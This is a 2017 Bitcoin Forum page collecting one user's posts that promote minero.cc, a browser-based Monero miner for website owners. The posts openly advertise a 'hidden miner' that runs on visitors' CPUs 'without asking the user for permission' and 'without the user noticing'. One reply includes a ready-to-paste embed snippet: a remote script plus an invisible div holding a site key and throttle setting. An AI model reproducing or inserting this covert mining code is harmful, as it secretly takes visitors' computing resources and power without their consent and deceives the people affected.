Bitcoin Forum
May 08, 2024, 01:55:36 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: [1]
1  Alternate cryptocurrencies / Mining (Altcoins) / Re: Monero web mining with minero.cc on: October 22, 2017, 04:52:44 AM
cashout is instant ?? and minimum ??

Cashout is instant as soon as you reach the minimum, which is configurable to no lower than 0.5 XMR.

One feedback I've received is that 0.5 XMR is too hard to reach for small publishers and we are currently looking at ways to lower it.
2  Alternate cryptocurrencies / Mining (Altcoins) / Re: Monero web mining with minero.cc on: October 21, 2017, 09:16:25 AM
How could I make some testing with that script ? I have many website which have thousands visitor per day.

If you want the miner to run in the background while your users visit the website, you can simply use the hidden miner out of the box.

If you want to be very conservative on the resources that you use from your visitors, I recommend that you start with throttle enabled to 0.5, and maybe later change it closer to 0, or just drop it. The final code you need to insert in your HTML source should look something like this:

Code:
<script src="https://minero.cc/lib/minero-hidden.min.js" async></script>
<div class="minero-hidden" style="display: none" data-key="YOUR_SITE_KEY" data-throttle="0.5"></div>

You will need to replace YOUR_SITE_KEY with your actual key, which you can get from the dashboard after you sign up.

Let me know if it works well for you. Good luck!
3  Alternate cryptocurrencies / Mining (Altcoins) / Re: Monero web mining with minero.cc on: October 20, 2017, 04:25:43 AM
Is this open source? Preferably a Github project page? I'd love to see how this works and of course it would be nice to see that we are indeed getting 80% of the mining profits.

It's not open source at the moment. I don't plan to open source it any time soon but maybe one day.

As to verifying that users actually get 80% of the rewards, that can be done without having any server-side code. The logic in JS is quite simple and if you really wanted you could take a look at the code, count the number of hashes you are computing, and then do the math to compare that against how much you are getting paid.
4  Alternate cryptocurrencies / Mining (Altcoins) / Monero web mining with minero.cc on: October 19, 2017, 07:13:32 AM
Announcing https://minero.cc, a JavaScript plugin for mining Monero (XMR) in Web browsers.

It can be used for solo mining without installing software, and it can be integrated in your website and use your visitor's CPU to mine Monero for you. It is a good alternative to ads for monetizing websites.

The technologies used are NaCL and WASM, which allow safe execution of efficient applications on modern browsers. Because it's safe, it can run without asking the user for permission, so it can run in the background without the user noticing.

You get paid fairly for the amount of hashes that you contribute. You get 80% of the mining reward and the remaining 20% goes to cover the running costs of the service. This fee is lower than what similar services charge.

I'm the main developer of the service and I'm looking for feedback. Happy to answer questions too.
5  Alternate cryptocurrencies / Speculation (Altcoins) / Re: [XMR] Monero Speculation on: October 17, 2017, 06:47:54 AM
The coinhive.com success will increase the risk of the 51% attack. So why should not we start more of these web-mining services? Mining will be decentralized more and there will be less 51% risk.

The Monero community for sure have ability to do this.

I think there are some people already working on it. I agree it is a good idea to encourage those efforts.


Hmm... Sounds good. So you think some people are working on, or do you know some are working on it?

And we need many of these webmining services. So that there for sure is as less centralization as possible. And to let the webminingpool fees to go down. Anyway what kind of a hardware/software/maintenance is needed at the webmining service provider side? If money is needed to start this, it will not be a problem. XMR crowd funding will do it in no time.

Yea. Definetely webmining is good for any coin. Specially as long as there is enough webminingpools to keep it decentralized.

We are working on it! We are https://minero.cc and we are offering most of the services that the competition offers, at a smaller fee. Currently looking for publishers interested in trying out our miner.
6  Economy / Service Announcements / Re: minero.cc - Web embeddable Monero miner on: October 17, 2017, 06:36:29 AM
Monero.cc has been revamped!

Now it offers a JavaScript API and REST API that is very similar to the competition.
We also realized the 1% fee was making us lose money and we bumped it a bit higher, but continues to be smaller than the competition's.

Here is the full list of features we've implemented:
- JavaScript API
- REST API
- Miner UI
- Hidden Miner
- Regular account registration with email and password
- Support for most browsers
- Smaller fee than the competitors
- The fee is only 20% so you get 80% of the reward

We'd love to hear your feedback!
7  Economy / Service Announcements / Re: minero.cc - Web embeddable Monero miner on: October 17, 2017, 06:24:49 AM
Minimum payment threshold 0.5 xmr? For publishers it will take ages to reach that amount. It will be better if you change the minimum payout threshold. Or you will get more miners if you exchange the mined xmr to btc and send the payments via faucethub when it reaches a minimum of 1000btc or something like that. Check out this link. dogeminers.com. Its also a web miner. Here the minimum withdrawal limit is 0.00000001doge.

That's a very good suggestion. We understand it can be hard to reach 0.5 for some publishers and having a smaller payout will be helpful. We'll look into that!
8  Economy / Service Announcements / minero.cc - Web embeddable Monero miner on: September 25, 2017, 06:51:45 AM
Introducing minero.cc, a Monero miner that runs in your browser seamlessly and can be embedded in your website to generate revenue.


Easy mining
- Mine Monero in your webiste without installing plug-ins or special software.
- There is a pool that all miners contribute to, and when a new block is found by the pool, the reward is distributed fairly among miners based on their hash power contribution.
- Automatic payments when you reach a balance of 0.5 XMR.
- The pool gets a small fee (1%) from the block reward.
- Recommended browser: Google Chrome
- Support for more browsers coming soon.

Web embeddable miner
- Targeted at website owners.
- Put an invisible miner in your website and use your visitors idle CPU to mine Monero and generate revenue for you.

Note: This service is in beta and you may find bugs and encounter problems using it. Feedback is highly appreciated.
Pages: [1]
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!